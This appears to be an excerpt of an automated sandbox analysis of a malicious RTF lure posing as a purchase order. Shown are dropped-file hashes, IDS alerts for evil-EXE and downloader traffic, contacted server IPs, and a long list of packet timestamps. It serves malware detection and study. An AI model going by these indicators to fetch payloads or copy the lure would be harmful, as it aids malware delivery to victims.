                                              Process:C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):137749
                                              Entropy (8bit):7.910012866686291
                                              Encrypted:false
                                              SSDEEP:3072:14mjfyHDoI7hM+bcFCRch/CaEP4dyXASDx/vsEjENF8gy:/OjFM+gMo/XZdyXASDdk/49
                                              MD5:F05488F9898F5095AE2446C59CB9CA1C
                                              SHA1:577CA8A7C17014C157E383060F6139CD4D01A87D
                                              SHA-256:1EABCEA4E7E21487ABFD428AE395AE7B2C4E8FA7461BE4D10C8AB3EC130045D5
                                              SHA-512:9607CDBA7B7814FFA314BCDAC7EF6339CA7C6FD365F14BA15BE40A82CE463557E076CCFD52A8C8DFD1BDE8A49745A469462A2115EB2D8EB00DBCE43CDF886511
                                              Malicious:false
                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.......=.9.y..|....^.zmc.m9ckw..7`.a...xHF.1&.$`.....c....$.FB.r.F9K#i$.5(...D...S..]]].n.....}.K..RW..z......O............... ...........5..@...........j....q?.7v...w..+./...G......b,..j4.s..........}....S.?G...................o..\..nxj).....>..}..E...gB......{...v...G...c.Rs.`h'55y<.I...A...4.;...o.I[6o....i..]...~z.....D............. .i...?6...?Cg.#:x.h.!......Z..h.Dk.N...>..B..a5h. ...n._[.QS..#NG...].F...J\q..i.&Z.../XL..-.%...%.h...t..).1.`..5.j.*Z.t....e.....,u..............5..\...>}.y\5 ........K.o.A.[.......Dk......."Z..h...i.N.}...s.?......c........G......G....um.o=.e4.gL.A.....+.....f....i..1....S...|....`........;.o.....3...u.3...%..........(.6...s.cx...H....C.#.'m.4....Y._...........s..>.....>:..n..I...^:.>..i..~w..y.}.....i.../$.Zk...@~..%m.u.8J}.Z.qP'..5;.29s..M.<..-^F.:6...s..7.e.4.f.IS&M..G.HS'M...W:.)..G.R..vi.M.8..g..5.Z_j..ym.
                                              File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (47032), with CRLF, CR, LF line terminators
                                              Entropy (8bit):2.6927963408086315
                                              TrID:
                                              • Rich Text Format (4004/1) 100.00%
                                              File name:Thyssenkrupp PO040232.doc
                                              File size:591'385 bytes
                                              MD5:d441cab32cafefaed9326b791cfc3b15
                                              SHA1:44aa1ba0ae5fb845899750881708003365937cea
                                              SHA256:b9a387acc992d7431adfbbf28a1b18baa07c1dc64592c193d78c6a517747692d
                                              SHA512:226dac350c27e776833aea90bb16c40d460a558a0361e76e86b2d64406f800222c523634e8082f38ba102ce80e0a75d84ba11655039ce33cedd1ddb95a4ab538
                                              SSDEEP:6144:PwAYwAYwAYwAYwAGWwzVzoSDrLwc8AdhsKQNSj9zURWWG:G9
                                              TLSH:9CC4452ED34B05598F62437B9B5B0E5542BCBA3EF38151B0346C537833EAC3A922667D
                                              File Content Preview:{\rt..{\*\yo7wdnPS8Ofqn6flVuiQL4Rzjwy5aJNdujEyVKW93fpWJ0gYfkCwu81sCAMgPsWdYiQzdIWOaK1Maq9Cabu1zrt8oGQXm42oyeyAY7DplJWVA0sJGM8p9dqQZ6RlDJgnCTBeoDM7cVc7buealx8XtsdOWdhYGzGGE3JbwxlvBqaMOxEe6GDGl04hhjS3QVXr8JeARnBuUCiO5YPBJCeDIOv08K1PHHJEvAUWs6PiYUHMC7xpRghU1
                                              Icon Hash:2764a3aaaeb7bdbf
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-26T09:19:22.080013+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.12380192.168.2.2249161TCP
                                              2024-09-26T09:19:22.216241+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.12380192.168.2.2249161TCP
                                              2024-09-26T09:19:27.712093+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162193.122.130.080TCP
                                              2024-09-26T09:19:29.038087+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162193.122.130.080TCP
                                              2024-09-26T09:19:29.445238+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249164188.114.97.3443TCP
                                              2024-09-26T09:19:30.394686+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249165132.226.247.7380TCP
                                              2024-09-26T09:19:30.835613+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249166188.114.96.3443TCP
                                              2024-09-26T09:19:33.963816+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249170188.114.96.3443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 09:19:21.357820988 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:21.362895012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:21.362970114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:21.363132954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:21.370096922 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.079797029 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.079852104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.079896927 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.079940081 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.079977036 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.079988956 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080013037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.080025911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080025911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080059052 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080123901 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.080176115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080177069 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.080213070 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.080219984 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080250025 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.080255032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.080291986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.084897041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.084959984 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.084984064 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.085000038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.085014105 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.085047960 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.085277081 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.085334063 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.086163998 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207556009 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207602024 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207652092 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207660913 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207653046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207696915 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207717896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207729101 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207748890 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207768917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207787037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207834005 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207838058 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207850933 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.207890034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.207890034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208182096 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208235979 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208255053 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208272934 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208292007 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208304882 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208332062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208332062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208831072 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208888054 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208888054 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208905935 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208947897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208947897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.208951950 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.208969116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.209009886 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.209009886 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.209736109 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.209764957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.209781885 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.209789991 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.209804058 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.209825993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.209917068 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.209933996 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.209965944 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.209976912 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.210642099 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.210689068 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.210697889 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.210738897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.216240883 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.216293097 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.216329098 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.216345072 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.216373920 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.216384888 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336102962 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336179972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336218119 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336225986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336225986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336251974 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336260080 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336289883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336289883 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336323977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336366892 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336415052 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336447954 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336484909 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336500883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336500883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336500883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336500883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336500883 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336529016 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336580038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336615086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336632013 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336648941 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336658955 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336685896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.336694002 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.336731911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337596893 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337650061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337657928 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337688923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337697029 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337723970 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337726116 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337759018 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337769032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337795973 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337804079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337833881 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.337837934 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.337876081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338598967 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338651896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338651896 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338689089 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338694096 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338723898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338737965 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338761091 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338774920 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338795900 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338812113 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338840961 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.338846922 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.338898897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.339988947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340039968 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340049982 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340078115 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340082884 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340115070 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340118885 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340151072 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340156078 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340186119 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340193987 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340224981 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340228081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340265989 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340854883 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340889931 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340914011 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340934992 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.340934992 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340971947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.340976954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341006994 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341022968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341042042 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341049910 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341080904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341098070 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341125965 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341353893 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341387987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341407061 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341423035 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341432095 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341458082 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341466904 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341492891 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341500998 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341540098 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.341541052 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.341588020 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701376915 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701440096 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701468945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701498032 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701499939 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701534986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701545000 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701570988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701580048 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701606035 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701616049 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701651096 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701659918 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701709986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701714039 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701749086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701757908 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701781988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701791048 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701814890 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701823950 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701847076 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701850891 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701867104 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701885939 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701891899 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701920986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701936960 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701956987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701967001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.701992035 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.701999903 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702029943 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702035904 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702068090 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702080965 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702111959 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702455997 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702490091 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702510118 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702523947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702533960 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702558041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702567101 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702591896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702604055 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702625036 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702637911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702658892 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702675104 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702692032 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702702045 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702728987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702734947 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702764988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.702770948 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702812910 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.702967882 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703022003 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703023911 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703058004 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703078985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703090906 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703100920 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703125000 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703133106 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703159094 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703172922 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703193903 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703201056 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703227997 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703236103 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703262091 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703274965 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703295946 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703313112 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703332901 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703339100 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703366995 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703370094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703412056 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703439951 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703474045 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703493118 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703506947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703516006 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703541040 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703547001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703577995 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703586102 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703612089 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703623056 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703646898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703660965 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703680992 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703690052 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703716993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703723907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703752995 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.703768015 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.703800917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.704782009 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.704838037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.704844952 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.704875946 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.704884052 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.704911947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.704924107 CEST4916180192.168.2.2266.63.187.123
